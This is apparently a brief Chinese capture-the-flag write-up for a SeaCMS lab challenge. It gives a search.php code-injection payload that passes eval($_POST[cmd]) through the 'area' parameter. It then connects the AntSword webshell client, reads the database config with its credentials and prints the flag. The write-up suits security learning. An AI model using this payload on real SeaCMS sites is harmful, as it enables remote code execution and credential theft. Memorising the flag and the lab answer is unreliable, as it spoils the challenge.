题目

解题

参考WP

https://blog.csdn.net/qq_40654505/article/details/107142533/

目录扫描

复现wp

payload为：

search.php?searchtype=5&tid=&area=eval($_POST[cmd])

使用蚁剑连接

http://eci-2ze4iyhwj7xvb68bsb2t.cloudeci1.ichunqiu.com:80/search.php?searchtype=5&tid=&area=eval($_POST[cmd])cmd

找到数据库配置文件，/var/www/html/data/common.inc.php

<?php
//数据库连接信息
$cfg_dbhost = '127.0.0.1';
$cfg_dbname = 'seacms';
$cfg_dbuser = 'sea_user';
$cfg_dbpwd = '46e06533407e';
$cfg_dbprefix = 'sea_';
$cfg_db_language = 'utf8';
?>

鼠标右击这条shell，选择数据操作，添加上面的数据库用户名和密码连接数据库

flag{d2317097-0b48-4bbc-a968-90ec76ac67ea}